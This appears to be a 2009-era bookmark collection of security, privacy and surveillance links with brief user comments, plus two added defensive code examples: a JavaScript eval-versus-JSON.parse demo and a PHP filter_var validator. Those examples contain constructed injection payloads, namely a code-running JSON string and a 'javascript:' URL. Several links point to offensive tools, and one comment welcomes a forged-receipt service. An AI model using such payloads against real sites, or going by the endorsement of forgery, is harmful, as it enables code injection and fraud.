Basic plugins you should install in WordPress. An introduction to practical plugins that "you'd be losing out not to install". Security measures: [Akismet] filters out spam comments. It's bundled from the start, so enable it. It needs a WordPress.com API key, so don't be lazy; register by following the on-screen instructions. By the way, the same key can be reused if you set up another WordPress site. [Secure Wor...
Install later
Improving jQuery’s JSON performance and security | Encosia
http://encosia.com/2009/07/07/improving-jquery-json-performance-and-security/
Improve JSON speed
When you’re working with JSON, performance and security are often opposing, yet equally important concerns. One of these areas of contention is handling the JSON strings returned by a server. Most JavaScript libraries do a great job of abstracting away the details, but the underlying process has long been a frustrating exercise in compromise. On one hand, eval() is the fastest widely available method, but it is not safe. On the other hand, textual JSON parsers written in JavaScript may be much safer, but are dramatically slower. In client-side situations, where milliseconds count, such a large performance overhead is typically too prohibitive to accept. Recently, an exciting new alternative has emerged: browser-native JSON parsing. Integrating JSON parsing as part of the browser’s implementation of JavaScript allows for using the more secure parsing method, and even provides performance faster than eval() offers. To take advantage of that, this post will show you how to detect whether or not a browser supports native JSON parsing, and how to force jQuery to use browser-native parsing in its $.ajax calls when it is available.
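Added example, not code from the Encosia post: the feature test for native JSON parsing, a fallback that validates the text before falling back to eval(), and a constructed hostile payload showing what bare eval() lets through. The validation regexes are the json2.js technique that jQuery's parseJSON also used; the payload, the function names and the use of globalThis as the "damage" marker are assumptions for the demo.

```javascript
// Added example, not from the Encosia post: native JSON detection, a
// validate-then-eval fallback, and a constructed hostile payload.

function hasNativeJSON() {
  return typeof JSON === 'object' && JSON !== null && typeof JSON.parse === 'function';
}

// The fast-but-unsafe way: anything that is valid JavaScript runs.
function parseWithEval(text) {
  return eval('(' + text + ')');
}

// Fallback for browsers without JSON.parse (json2.js technique): strip
// escapes, strings and literals, then refuse anything that is not pure JSON
// punctuation before handing the text to eval.
function looksLikeJSON(text) {
  const stripped = text
    .replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
    .replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, ']')
    .replace(/(?:^|:|,)(?:\s*\[)+/g, '');
  return /^[\],:{}\s]*$/.test(stripped);
}
function parseValidated(text) {
  if (!looksLikeJSON(text)) throw new SyntaxError('not JSON');
  return eval('(' + text + ')');
}

// What the post asks jQuery to do: native parser first, validated eval second.
function parseSafely(text) {
  return hasNativeJSON() ? JSON.parse(text) : parseValidated(text);
}

// Constructed hostile "JSON": a compromised server, or a man-in-the-middle on
// plain HTTP, returns executable code in place of data.
const HOSTILE = '{"user": (function () { globalThis.pwned = true; return "mallory"; })()}';
const BENIGN = '{"user": "alice", "roles": ["admin", "dev"]}';

function demo() {
  globalThis.pwned = false;
  const viaEval = parseWithEval(HOSTILE);          // runs the function: pwned becomes true
  const ranCode = globalThis.pwned === true;
  let safeRejected = false;
  try { parseSafely(HOSTILE); } catch (e) { safeRejected = e instanceof SyntaxError; }
  let validatedRejected = false;
  try { parseValidated(HOSTILE); } catch (e) { validatedRejected = e instanceof SyntaxError; }
  return {
    viaEvalUser: viaEval.user,                      // "mallory": eval happily returned the result
    ranCode,                                        // true
    safeRejected,                                   // true: JSON.parse throws SyntaxError
    validatedRejected,                              // true: the regex gate refuses it
    benign: parseSafely(BENIGN).roles[0],           // "admin"
  };
}
```

The point of the feature test is that the native path is both the safer and the faster one; the regex gate exists only for browsers that lack it, and it still ends in eval, so it is a fallback, not a preference.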
Metasploit Unleashed - Mastering the Framework
http://www.offensive-security.com/metasploit-unleashed/
Metasploit Bible (free)
Matasano Security LLC - Chargen - Indie Software Security: A ~12 Step Program
http://chargen.matasano.com/chargen/2009/9/24/indie-software-security-a-12-step-program.html
Good presentation
1 hr talk (via DaringFireball)
20+ Powerful Wordpress Security Plugins and Some Tips and Tricks : Speckyboy Design Magazine
http://speckyboy.com/2009/09/22/20-powerful-wordpress-security-plugins-and-some-tips-and-tricks/
20+ Powerful Wordpress Security Plugins and Some Tips and Tricks
masterlock-01.png (PNG Image, 1872x1224 pixels)
http://vdm3gd.files.wordpress.com/2009/09/masterlock-01.png
OR YOU CAN CLIP IT OFF
10 settings to apply right after buying an iPhone 3GS | nanapi
http://r.nanapi.jp/417/
For when I eventually buy an iPhone.
Infiltrating a Botnet - Cisco Systems
http://www.cisco.com/web/about/security/intelligence/bots.html
Article about a botnet master who was interviewed over MSN by a Cisco expert. Particularly interesting are his reasons for not taking a "normal" job.
GR: Infiltrating a Botnet - Cisco Systems http://bit.ly/1jHXy6 [from http://twitter.com/robinhowlett/statuses/3516971966]
Technical, but interesting read.
A Lesson In Timing Attacks (or, Don't use MessageDigest.isEquals) | codahale.com
http://codahale.com/a-lesson-in-timing-attacks/
Timing Attacks
Simple Techniques to Lock Down your Website - Nettuts+
http://net.tutsplus.com/tutorials/php/simple-techniques-to-lock-down-your-website/
One crucial part of PHP development practice is always keeping in mind that security is not something you can simply buy off the shelf at your local convenient
Official Google Blog: Teaching computers to read: Google acquires reCAPTCHA
http://googleblog.blogspot.com/2009/09/teaching-computers-to-read-google.html
Teaching computers to read: Google acquires reCAPTCHA - http://bit.ly/mNdrd [from http://twitter.com/hadhad/statuses/4038838588]
Found this: Teaching computers to read: Google acquires reCAPTCHA: Shared by cec Wholly geek batman ... http://bit.ly/dTqYG [from http://twitter.com/kekil/statuses/4034854001]
"In this way, reCAPTCHA’s unique technology improves the process that converts scanned images into plain text, known as Optical Character Recognition (OCR). This technology also powers large scale text scanning projects like Google Books and Google News Archive Search. Having the text version of documents is important because plain text can be searched, easily rendered on mobile devices and displayed to visually impaired users. So we'll be applying the technology within Google not only to increase fraud and spam protection for Google products but also to improve our books and newspaper scanning process. That's why we're excited to welcome the reCAPTCHA team to Google, and we're committed to delivering the same high level of performance that websites using reCAPTCHA have come to expect. Improving the availability and accessibility of all the information on the Internet is really important to us, so we're looking forward to advancing this technology with the reCAPTCHA team."
I know I'm late to the game commenting on this one, but damn this kind of thing pisses me off. Can't we have just one thing that is cool on the internet without it getting acquired by Google or Yahoo? I'm not as anti-google as most, but all of a sudden reCAPTCHA feels exploitative. Brewster Kahle, where is the alternative for archive.org?
Reading: Teaching computers to read: Google acquires reCAPTCHA http://bit.ly/141R6p [from http://twitter.com/sandroalberti/statuses/4057584396]
Google acquire reCAPTCHA - teaching computers to read - http://bit.ly/IT1DZ [from http://twitter.com/nick_b/statuses/4050051801]
Google has acquired reCAPTCHA, a company that provides CAPTCHAs to help protect more than 100,000 websites from spam and fraud.
PJF's Pages - Journal - Dark Stalking on Facebook
http://pjf.id.au/blog/?position=590
What makes this all rather chilling is that I'm doing all of this via the application API. If your friend has installed an application, then it can access quite a lot of information about you, unless you turn it off. If your friend has granted the application the read_stream privilege, then it can read your status stream. Even if a friend of a friend has done this, and you comment on your friend's status entries, it's possible to infer your existence and retrieve those discussions through dark stalking.
Most recently, I've been able to obtain status feeds, even for users who have very tight privacy settings, although I had to tweak my own application's privileges to do so. I don't know how far into the past these go, but they also come with likes information, and comments. This gives me a wealth of information on the strength and types of relationships people have. A person who comments a lot on another user's posts probably finds that user interesting. If I descended into keyword and text analysis, I may even be able to determine how they find that user interesting.
Programs to pull info out of facebook accounts
the information available to people via facebook is amazing....
The Hidden Risks of Cloud Computing - Security - Lifehacker
http://lifehacker.com/5325169/the-hidden-risks-of-cloud-computing
Every day more users move their computing lives from the desktop to the cloud and rely on hosted web applications to store and access email, photos, and documents. But this new frontier involves serious risks that aren't obvious to most.
In an era of ubiquitous broadband, smartphones, and users who manage multiple computers and devices, it just makes sense to move your email, photos, documents, calendar, notes, finances, and contacts to awesome web applications like Gmail, Evernote, Flickr, Google Docs, Mint, etc. But transferring your personal data to hosted web applications has its potential pitfalls, risks that get lost in all the hype around cloud-centric new products like Google's new Chrome OS or the iPhone.
Home
http://itshidden.com/index.php?option=com_content&view=article&id=48&Itemid=1
ItsHidden.com - A safe, easy, anonymous way to surf the net.
ItsHidden.com is the ultimate FREE surfing privacy service on the Internet with huge capacity and no complicated software to install, you already have everything you need on your computer right now!
On The Internet, Nobody Knows You’re Not In The USA
http://www.techcrunch.com/2009/10/05/internet-anonymizer-web-surf-vpn-hulu-pandora-spotify/
I think people should push back against rubbish like country-restricted offerings. Sorry, but that is just nonsense.
SVN Server Admin Issue: Fix It! « Smashing Magazine
http://www.smashingmagazine.com/2009/09/25/svn-strikes-back-a-serious-vulnerability-found/
Serious problems like this aren’t supposed to exist nowadays. Every serious or visible exploit is found and fixed quickly. But here we will show you something simple and ordinary yet quite dangerous.
How to Crack a Master Lock | Incredimazing
http://incredimazing.com/page/How_to_Crack_a_Master_Lock
How to Crack a Master Lock - Via: http://www.mark ... - only at incredimazing.com
Crack a Master Combination Padlock Redux - Illustration - Lifehacker
http://lifehacker.com/5376442/crack-a-master-combination-padlock-redux
Official Gmail Blog: Choosing a smart password
http://gmailblog.blogspot.com/2009/10/choosing-smart-password.html
T. Kendall
SSH advanced techniques, part II
http://www.stearns.org/doc/ssh-techniques-two.current.html
Plugin Check
http://www.mozilla.com/en-US/plugincheck/
Plugins have more and more vulnerabilities, so how do you make sure yours are up to date? Mozilla provides this tool, which currently checks the latest versions of 15 plugins.
Check my mozilla firefox plugins to make sure they're up to date.
Wordpress Security - How to Secure Your WordPress Blog
http://wpsecure.org/
Know Privacy
http://knowprivacy.org/
A comparison of users' expectations of privacy online and the data collection practices of website operators.
Approach: A comparison of users' expectations of privacy online and the data collection practices of website operators. Goal: To identify specific practices that may be harmful or deceptive and attract the attention of government regulators. Result: Recommendations for policymakers to protect consumers and for website operators to avoid stricter regulation.
research site for ghostery
The Current State of Web Privacy, Data Collection, and Information Sharing
evil!
Know Privacy: research by Joshua Gomez, Travis Pinnick, and Ashkan Soltani, UC Berkeley School of Information, class of 2009
VueZone | Personal Video Network
http://www.vuezone.com/
Wireless live video camera for security or whatever
Vue is a network of small, battery operated wireless cameras that stream video directly to the internet.
Tarsnap public beta
http://www.daemonology.net/blog/2008-11-10-tarsnap-public-beta.html
"Tarsnap is an implementation of my idea of a perfect online backup service. After many months in private beta testing, tarsnap is now publicly available for BSD, Linux, and other UNIX-like operating systems."
Encrypted snapshotted remote backup. Good to see that competition is thriving in this/these space(s)
12 Useful FireFox Plugins For Safe Browsing | Smashing Downloads
http://www.smashingdownloads.com/2009/07/13/12-useful-firefox-plugins-for-safe-browsing/
Being secure, on the web specially is something we all need. There are thousands of risks roaming and getting evolved in shape of different malwares, viruses, file & more. Since these things come via your browser and majority of us use firefox, here are some of the best and useful plugins/add-ons which can help you be safe on the internet. -- http://digg.com/d1waHu
Fake Receipts | False Receipts | FalseExpense.com - the website for design, print and delivery of forged store receipts and fake sales receipts
http://www.falseexpense.com/
This will come in handy.
Apparently for NOVELTY USE ONLY - you supply info and this site prints an authentic-looking fake receipt on a thermal receipt printer. Mail fraud?
Top 10 Most Common Coding Mistakes in WordPress Plugins « planetOzh
http://planetozh.com/blog/2009/09/top-10-most-common-coding-mistakes-in-wordpress-plugins/
How To Build A WiFi Home Surveillance System With Your PC
http://www.makeuseof.com/tag/how-to-build-a-wifi-home-surveillance-system-with-your-pc/
Not quite what I was expecting, but simple enough.
Cheat Sheets - Packet Life
http://packetlife.net/library/cheat-sheets/
System Administrator Cheat Sheet
Exclusive: U.S. Spies Buy Stake in Firm That Monitors Blogs, Tweets | Danger Room | Wired.com
http://www.wired.com/dangerroom/2009/10/exclusive-us-spies-buy-stake-in-twitter-blog-monitoring-firm/
America’s spy agencies want to read your blog posts, keep track of your Twitter updates — even check out your book reviews on Amazon
America’s spy agencies want to read your blog posts, keep track of your Twitter updates — even check out your book reviews on Amazon. In-Q-Tel, the investment arm of the CIA and the wider intelligence community, is putting cash into Visible Technologies, a software firm that specializes in monitoring social media. It’s part of a larger movement within the spy services to get better at using ”open source intelligence” — information that’s publicly available, but often hidden in the flood of TV shows, newspaper articles, blog posts, online videos and radio reports generated every day. Visible crawls over half a million web 2.0 sites a day, scraping more than a million posts and conversations taking place on blogs, online forums, Flickr, YouTube, Twitter and Amazon. (It doesn’t touch closed social networks, like Facebook, at the moment.) Customers get customized, real-time feeds of what’s being said on these sites, based on a series of keywords.
Anderson Cooper 360: Blog Archive - 28 things I wish I'd known before I started traveling « - Blogs from CNN.com
http://ac360.blogs.cnn.com/2009/10/13/28-things-i-wish-i-knew-before-i-started-traveling/
9. The universal rule of taxi haggling, for both driver and passenger, is that once both sides agree on a fare before setting off, neither side can reopen negotiations once you’re en route. You should not try to get a better deal nor should you accept any increase in the fare from the driver after the journey has started
Google is Now an OpenID Provider - ReadWriteWeb
http://www.readwriteweb.com/archives/google_is_now_an_openid_provider.php
give Google Account users the option to sign in to websites with their Google credentials and without having to sign up for a new account at those sites
rd data formats such as Portable Contacts and OpenSocial REST APIs."
The Invisible Things Lab's blog: Evil Maid goes after TrueCrypt!
http://theinvisiblethings.blogspot.com/2009/10/evil-maid-goes-after-truecrypt.html
Using a password sniffer to get around full disk encryption.
Analysis of the Green Dam Censorware System
http://www.cse.umich.edu/~jhalderm/pub/gd/
Green Dam
We examined the Green Dam software and found that it contains serious security vulnerabilities due to programming errors. Once Green Dam is installed, any web site the user visits can exploit these problems to take control of the computer. This could allow malicious sites to steal private data, send spam, or enlist the computer in a botnet. In addition, we found vulnerabilities in the way Green Dam processes blacklist updates that could allow the software makers or others to install malicious code during the update process.
How Team of Geeks Cracked Spy Trade - WSJ.com
http://online.wsj.com/article/SB125200842406984303.html
Palantir Technologies has designed what many intelligence analysts say is the most effective tool to date to investigate terrorist networks. The software's main advance is a user-friendly search tool that can scan multiple data sources at once, something previous search tools couldn't do.
20 Linux Server Hardening Security Tips
http://www.cyberciti.biz/tips/linux-security.html
Turn Your PC into a Home Surveillance System - Security - Lifehacker
http://lifehacker.com/5385018/turn-your-pc-into-a-home-surveillance-system
Process Blocker for Windows
http://www.processblocker.com/
The aim of this project is to create an ideal administration tool which can prevent running any application in Windows. The development process is divided into a series of stages, each of them being indicated in the roadmap section. The project is targeted at the corporate audience and, among other things, sets a goal to develop powerful features for remote administration of all domain computers at once. The project started on October 20, 2008.
I Will Teach You How To Be Rich
Free VPN by WSC
http://www.thefreevpn.com/
Protecting the web for your security, privacy and anonymity! Get behind the VPN ! Get help from our Stuff! Free VPN by WSC * Access blocked websites from within a corporate environmement * Watch Hulu.com, Pandora.com, ABC.com, BBC.co.uk Abroad * Use VoIP software like Skype if it's blocked * Protect yourself from snoopers at Wi-Fi hotspots, hotels, airports, corporate offices and ISP hubs. * Hide your IP address for your privacy online 100% Security Through a VPN Free VPN by WSC Free VPN by WSC So go ahead - Get behind the Shield - Try Free VPN today! Free VPN runs on 32 bit and 64 bit Windows OS: * Windows 7 * Windows Vista * Windows XP * Windows 2008 * Windows 2003 By clicking on the download button, you are agreeing to the Free VPN terms of use. If you decide to uninstall Free VPN at any
How to Really Browse Without Leaving a Trace - Windows - Lifehacker
http://lifehacker.com/5395267/how-to-really-browse-without-leaving-a-trace
On The Internet, Nobody Knows You're Not In The USA - washingtonpost.com
http://www.washingtonpost.com/wp-dyn/content/article/2009/10/05/AR2009100500411.html?dyn=popular
How to access geographically targeted services.
hide your IP address - free tools are plenty available
using proxies to bypass geospecific IP restrictions
Build a Simple Password Strength Checker - Nettuts+
http://net.tutsplus.com/tutorials/javascript-ajax/build-a-simple-password-strength-checker/
Great, Simple, and Useful - Password Strength Checker Tutorial
Password security
ldd arbitrary code execution - good coders code, great reuse
http://www.catonmat.net/blog/ldd-arbitrary-code-execution/
use ldd to hack system
mattt* / Chroma-Hash: A Belated Introduction
http://mattt.me/2009/07/chroma-hash-a-belated-introduction/
A very smart visualization of passwords and its effect on usability.
Yesterday, I posted Chroma-Hash, an experiment in how to visualize the live-input of secure fields, such as a password on a login screen. So far, I’ve received a lot of great feedback, as well as a number of questions that I thought deserved a proper response. Before I go into any details, I invite you to check out the live demo, (if you haven’t seen it already), so you can get a clear idea of what Chroma-Hash does.
Article on how to solve the masked password issues. Solution doesn't work, but it's a start.
Elegant UI gives user visual feedback on correctness of "hidden" passwords
visualize the live-input of secure fields, such as a password on a login screen
What Facebook Quizzes Know About You
http://www.readwriteweb.com/archives/what_facebook_quizzes_know_about_you.php
A: Almost everything you've put on there.
How to legally identify the person behind defamatory posts about you online | nanapi
http://r.nanapi.jp/594/
For anyone who refuses on the grounds that it is personal information, make sure to point out that "under the Provider Liability Limitation Act, the party disclosing the information is not held liable as long as there is a clear reason for the disclosure."
Virus, Spyware & Malware Protection | Microsoft Security Essentials
http://www.microsoft.com/security_essentials/default.aspx
Microsoft Security Essentials
Schneier on Security: Self-Enforcing Protocols
http://www.schneier.com/blog/archives/2009/08/self-enforcing.html
Notes on methods to eliminate corruption in a system by making honesty the most advantageous course of action
"Here’s a self-enforcing protocol for determining property tax: the homeowner decides the value of the property and calculates the resultant tax, and the government can either accept the tax or buy the home for that price. Sounds unrealistic, but the Greek government implemented exactly that system for the taxation of antiquities. It was the easiest way to motivate people to accurately report the value of antiquities."
Five Best Antivirus Applications - antivirus - Lifehacker
http://lifehacker.com/5399564/five-best-antivirus-applications
Computer viruses are increasingly sophisticated and pervasive. If you can't afford to run your computer without some sort of antivirus software installed, check out these five popular options to protect your PC.
How to Secure Your New WordPress Installation | Digging into WordPress
http://digwp.com/2009/11/how-to-secure-your-new-wordpress-installation/
One of the best ways to ensure strong security for your WordPress-powered site is to secure its foundations during the installation process. Of course these techniques can be implemented at any point during the life of your site, but setting them before the game starts prevents headaches and saves time. We’ll start with the WordPress database.
Top 10 Wordpress Security Plugins | Tools | PelFusion.com
http://pelfusion.com/tools/top-10-wordpress-security-plugins/
security for WordPress
Comodo Easy VPN for Strong Encryption Software Security
http://easy-vpn.comodo.com/
Comodo EasyVPN allows businesses and home users to quickly group multiple computers into a secure, peer to peer, network over the Internet.
Windows only: Free application Creates a virtual private network between your computers for a hassle-free, secure private network. Simple to set up. Just install the application, register for an account, and then log in. Once you've got the app running on a couple of computers, you can easily (and securely) access one computer from the other as though you're on the same local network. As we mentioned in our guide to Hamachi, a VPN comes in handy when: * You're on the road with your laptop and want secure access to your PC's files. * Your office or dorm room computer is behind a restrictive firewall that doesn't let you reach it from the internet. * You want to add encryption to insecure network protocols like VNC. * You want to set up a shared folder of files for friends and family to access. Apart from the basics, EasyVPN also comes with a built-in, secure chat tool.
Stop Paying for Windows Security; Microsoft's Security Tools Are Good Enough - Security - Lifehacker
http://lifehacker.com/5401453/stop-paying-for-windows-security-microsofts-security-tools-are-good-enough
The most irritating feature introduced in Windows Vista was those annoying UAC prompts, asking you for permission to do nearly anything on your computer—and the fact is, even if it makes you feel more secure, it's a false sense of security. Malware researchers at SophosLabs found that 8 of 10 malware samples can actually bypass UAC on a system with the defa
Panda Cloud Antivirus, The first free cloud antivirus against viruses, spyware, rootkits and adware
http://www.cloudantivirus.com/en/
Panda Cloud, the constantly updated, cloud-run antivirus app that promises almost real-time protection from burgeoning web threats, is out of beta and available for a free download
http://lifehacker.com/5401263/panda-cloud-antivirus-available-for-download
vitamin d : home
http://www.vitamindinc.com/
Simple video monitoring software brings enterprise-grade functionality to anyone with a webcam or network camera.
Introducing Vitamin D Video. Our simple video monitoring software brings enterprise-grade functionality to anyone with a webcam or network camera.
Brian Mastenbrook: How I cross-site scripted Twitter in 15 minutes, and why you shouldn't store important data on 37signals' applications
http://brian.mastenbrook.net/display/36
How Twitter was hacked.
How To Prevent A USB Drive From Running Anything Automatically In Windows
http://www.makeuseof.com/tag/how-to-prevent-a-usb-drive-from-running-anything-automatically-in-windows/
USB flash drives are our personal data carriers, but the way we use it to exchange files also makes them open to viruses. The Achilles heel which viruses
Security: Lessons Learned from a Hacked Gmail Account
http://lifehacker.com/5110737/lessons-learned-from-a-hacked-gmail-account
Sanitize and Validate Data with PHP Filters - NETTUTS
http://net.tutsplus.com/tutorials/php/sanitize-and-validate-data-with-php-filters/
Data validation is an integral part of working with forms. Not only can invalid submitted data lead to security problems, but it can also break your webpage. Today, we'll take a look at how to remove illegal characters and validate data by using the "filter_var" function.
Data validation is an integral part of working with forms. Not only can invalid submitted data lead to security problems, but it can also break your webpage.
using filter_var to sanitise and validate input
Britain To Put CCTV Cameras Inside Private Homes | Gadget Lab | Wired.com
http://www.wired.com/gadgetlab/2009/08/britain-to-put-cctv-cameras-inside-private-homes/
As an ex-Brit, I’m well aware of the authorities’ love of surveillance and snooping, but even I, a pessimistic cynic, am amazed by the government's latest plan: to install Orwell’s telescreens in 20,000 homes.
£400 million ($668 million) will be spent on installing and monitoring CCTV cameras in the homes of private citizens.
SynJunkie: Command-Line Kung Fu
http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html
net stop
Free VPN Solutions for Securing Your Public Wi-Fi Sessions
http://webworkerdaily.com/2007/08/17/free-vpn-solutions-for-securing-your-public-wi-fi-sessions/
9/11 Pager data
http://911.wikileaks.org/
From 3AM on Wednesday November 25, 2009, until 3AM the following day (US east coast time), WikiLeaks is releasing over half a million US national text pager intercepts. The intercepts cover a 24 hour period surrounding the September 11, 2001 attacks in New York and Washington.
"WikiLeaks is releasing over half a million US national text pager intercepts. The intercepts cover a 24 hour period surrounding the September 11, 2001 attacks in New York and Washington. [...] Text pagers are usually carried by persons operating in an official capacity. Messages in the archive range from Pentagon, FBI, FEMA and New York Police Department exchanges, to computers reporting faults at investment banks inside the World Trade Center"
The Next Hacking Frontier: Your Brain? | Wired Science | Wired.com
http://www.wired.com/wiredscience/2009/07/neurosecurity/
In the past year, researchers have developed technology that makes it possible to use thoughts to operate a computer, maneuver a wheelchair or even use Twitter — all without lifting a finger. But as neural devices become more complicated — and go wireless — some scientists say the risks of “brain hacking” should be taken seriously.
scientists say the risks of “brain hacking” should be taken seriously.
you know...we really should call it 'Ghost-hacking'...
RT @wiredscience: The next target for hackers could be your brain. http://is.gd/1svMA [from http://twitter.com/reinikainen/statuses/2557678128]
Computer security for prosthetics http://www.wired.com/wiredscience/2009/07/neurosecurity/ [from http://twitter.com/JacksonATL/statuses/2621731930]
OpenID: Now more powerful and easier to use! | OpenID
http://openid.net/2009/09/25/more-powerful-and-easier-to-use/
This is the way the web should work. Facebook - please join this!
Google, Yahoo! and MySpace support for OpenID
Featured Download: Darik's Boot and Nuke is the Nuclear Option of Secure Data Shredding
http://lifehacker.com/5090567/dariks-boot-and-nuke-is-the-nuclear-option-of-secure-data-shredding
SHODAN - Computer Search Engine
http://shodan.surtri.com/
Computer Search Engine
SHODAN lets you find servers/ routers/ etc. The data in the index covers web servers, FTP, Telnet and SSH services.
SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Let me know which services interest you the most and I'll prioritize them in my scanning.
Input Validation: Using filter_var() Over Regular Expressions ~ Mattias Geniar
http://mattiasgeniar.be/2009/02/07/input-validation-using-filter_var-over-regular-expressions/
Data validation
FILTER_FLAG_ENCODE_LOW - Encode characters with ASCII value below 32
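The two filter_var entries above (the Nettuts+ tutorial and Mattias Geniar's note on FILTER_FLAG_ENCODE_LOW) describe the mechanism but do not show a full round of validation and sanitization. The PHP below is an added example, not code from either page; the form field names, the sample values, the age range and the http/https scheme whitelist are all invented for illustration.

```php
<?php
// Added example (not from the bookmarked tutorials): validating typed fields
// and sanitizing free text with filter_var(). Field names, sample values and
// limits are invented for illustration.

// Constructed sample submission, shaped like $_POST.
$submitted = [
    'email'   => 'alice@example.com',
    'age'     => '27',
    'website' => 'javascript://example.com/%0Aalert(1)',
    'ip'      => '192.168.1.20',
    'comment' => "Hello\x01 <b>world</b>",
];

/**
 * Validate the fields that have a strict expected type. Every FILTER_VALIDATE_*
 * filter returns the normalized value on success and false on failure, so test
 * with === false rather than truthiness ("0" is a perfectly valid integer).
 */
function validate_form(array $in): array
{
    $clean  = [];
    $errors = [];

    $email = filter_var($in['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $errors['email'] = 'invalid address';
    } else {
        $clean['email'] = $email;
    }

    // Integer with an allowed range, supplied through the options array.
    $age = filter_var($in['age'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 13, 'max_range' => 120]]);
    if ($age === false) {
        $errors['age'] = 'not an integer between 13 and 120';
    } else {
        $clean['age'] = $age;
    }

    // FILTER_VALIDATE_URL checks URL syntax only. A value such as
    // javascript://example.com/%0Aalert(1) has a scheme and a host and so
    // parses as a URL; the scheme has to be whitelisted separately.
    $url    = filter_var($in['website'] ?? '', FILTER_VALIDATE_URL);
    $scheme = $url === false ? '' : strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if ($url === false || !in_array($scheme, ['http', 'https'], true)) {
        $errors['website'] = 'must be an http(s) URL';
    } else {
        $clean['website'] = $url;
    }

    // IPv4 only, and reject private and reserved ranges (192.168.1.20 fails here).
    $ip = filter_var($in['ip'] ?? '', FILTER_VALIDATE_IP,
        FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
    if ($ip === false) {
        $errors['ip'] = 'not a public IPv4 address';
    } else {
        $clean['ip'] = $ip;
    }

    return ['clean' => $clean, 'errors' => $errors];
}

/**
 * Sanitize free text before storing it: drop tags, then encode control
 * characters (ASCII below 32) with FILTER_FLAG_ENCODE_LOW so they cannot be
 * smuggled into log lines or headers later, and strip bytes above 127.
 * HTML output encoding is still applied separately at render time.
 */
function sanitize_comment(string $raw): string
{
    $noTags = strip_tags($raw);
    // FILTER_UNSAFE_RAW does nothing by itself; the flags do the work.
    return filter_var($noTags, FILTER_UNSAFE_RAW,
        FILTER_FLAG_ENCODE_LOW | FILTER_FLAG_STRIP_HIGH);
}

$result = validate_form($submitted);
$result['clean']['comment'] = sanitize_comment($submitted['comment']);
print_r($result);
```

Validation and sanitization are kept apart on purpose: the typed fields are rejected outright when they do not match, while the free-text comment is transformed and accepted. The scheme check on the URL is the piece filter_var does not do for you, and it is the one that matters most when the value is later echoed into an href.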
Comodo EasyVPN Creates a Virtual Private Network in a Few Clicks - Vpn - Lifehacker
http://lifehacker.com/5401401/comodo-easyvpn-creates-a-virtual-private-network-in-a-few-clicks
Windows only: Free application Comodo EasyVPN creates a virtual private network between your computers for a hassle-free, secure private network. That means you can access, for example, anything on your home computer from work as though you're on the same local network.
"Once you've got the app running on a couple of computers, you can easily (and securely) access one computer from the other as though you're on the same local network."
Un-Google Yourself - Wired How-To Wiki
http://howto.wired.com/wiki/Un-Google_Yourself
OpenDPI - The Open Source Deep Packet Inspection Engine
http://www.opendpi.org/
OpenDPI - The Open Source Deep Packet Inspection Engine
OpenDPI is a software library designed to classify Internet traffic according to network protocols. For this purpose mainly deep packet inspection (DPI) is used. OpenDPI is derived from PACE, the traffic classification engine of ipoque, a provider of carrier-grade DPI and bandwidth management solutions. In contrast to ipoque's PACE engine, OpenDPI does not support the detection of encrypted protocols and it does not use any heuristic and behavioral analysis for classification.
OpenDPI is a software component for traffic classification based on deep packet inspection.
FreeMyPDF.com - Removes passwords from viewable PDFs
http://freemypdf.com/
Use this site to remove passwords and restrictions (such as printing, copying text, etc.) from PDFs. Note: This only works for PDFs that you can open and read without any 3rd party plugins. PDFs that require a password to be viewed cannot be unlocked by this service.
Google Public DNS
http://code.google.com/speed/public-dns/
"a free, global Domain Name System (DNS) resolution service"
10 Wordpress Security Plugins To Keep Your Blog Safe « WebM.ag | Web Design Magazine
http://www.webm.ag/2009/12/04/10-wordpress-security-plugins-to-keep-your-blog-safe/
!exploitable Crash Analyzer - MSEC Debugger Extensions - Home
http://www.codeplex.com/msecdbg
via http://blogs.microsoft.co.il/blogs/sasha/archive/2009/09/06/exploitable-crash-analyzer.aspx
The Rails Way: Users and Passwords
http://www.therailsway.com/2009/8/3/users-and-passwords
a simple best practices article on handling passwords and authentication. There’s nothing particularly new here, but it’s always worthwhile revisiting the basics.
WPA CRACKER
http://www.wpacracker.com/
Panda Cloud Antivirus FREE - The first free cloud antivirus against viruses, spyware, rootkits and adware
http://www.cloudantivirus.com/Default.aspx?lang=eng
Panda Cloud Antivirus is a really light, install-and-forget antivirus client that protects faster against the latest viruses. Download free antivirus and anti-spyware protection.
The History of Hacking | IT Security | Focus.com
http://www.focus.com/fyi/it-security/history-hacking/
Data protection on the web: How to hide from Google - SPIEGEL ONLINE - Nachrichten - Netzwelt
http://www.spiegel.de/netzwelt/netzpolitik/0,1518,665613,00.html
How to hide from Google
Interesting article on SpOnline
Facebook's New Privacy Changes: The Good, The Bad, and The Ugly | Electronic Frontier Foundation
http://www.eff.org/deeplinks/2009/12/facebooks-new-privacy-changes-good-bad-and-ugly
In conclusion, we at EFF are worried that today's changes will lead to Facebook users publishing to the world much more information about themselves than they ever intended.
The new changes are intended to simplify Facebook's notoriously complex privacy settings and, in the words of today's privacy announcement to all Facebook users, "give you more control of your information." But do all of the changes really give Facebook users more control over their information? EFF took a close look at the changes to figure out which ones are for the better — and which ones are for the worse.
Welcome to The M.H.A.
http://themha.com/airlock/
App that locks your Mac when your iPhone goes out of range
security osx iPhone sysadmin
Lock your computer when you (actually, your iPhone) are out of range.
Schneier on Security: My Reaction to Eric Schmidt
http://www.schneier.com/blog/archives/2009/12/my_reaction_to.html
This is the loss of freedom we face when our privacy is taken from us. This is life in former East Germany, or life in Saddam Hussein's Iraq. And it's our future as we allow an ever-intrusive eye into our personal, private lives. Too many wrongly characterize the debate as "security versus privacy." The real choice is liberty versus control. Tyranny, whether it arises under threat of foreign physical attack or under constant domestic authoritative scrutiny, is still tyranny. Liberty requires security without intrusion, security plus privacy. Widespread police surveillance is the very definition of a police state. And that's why we should champion privacy even when we have nothing to hide.
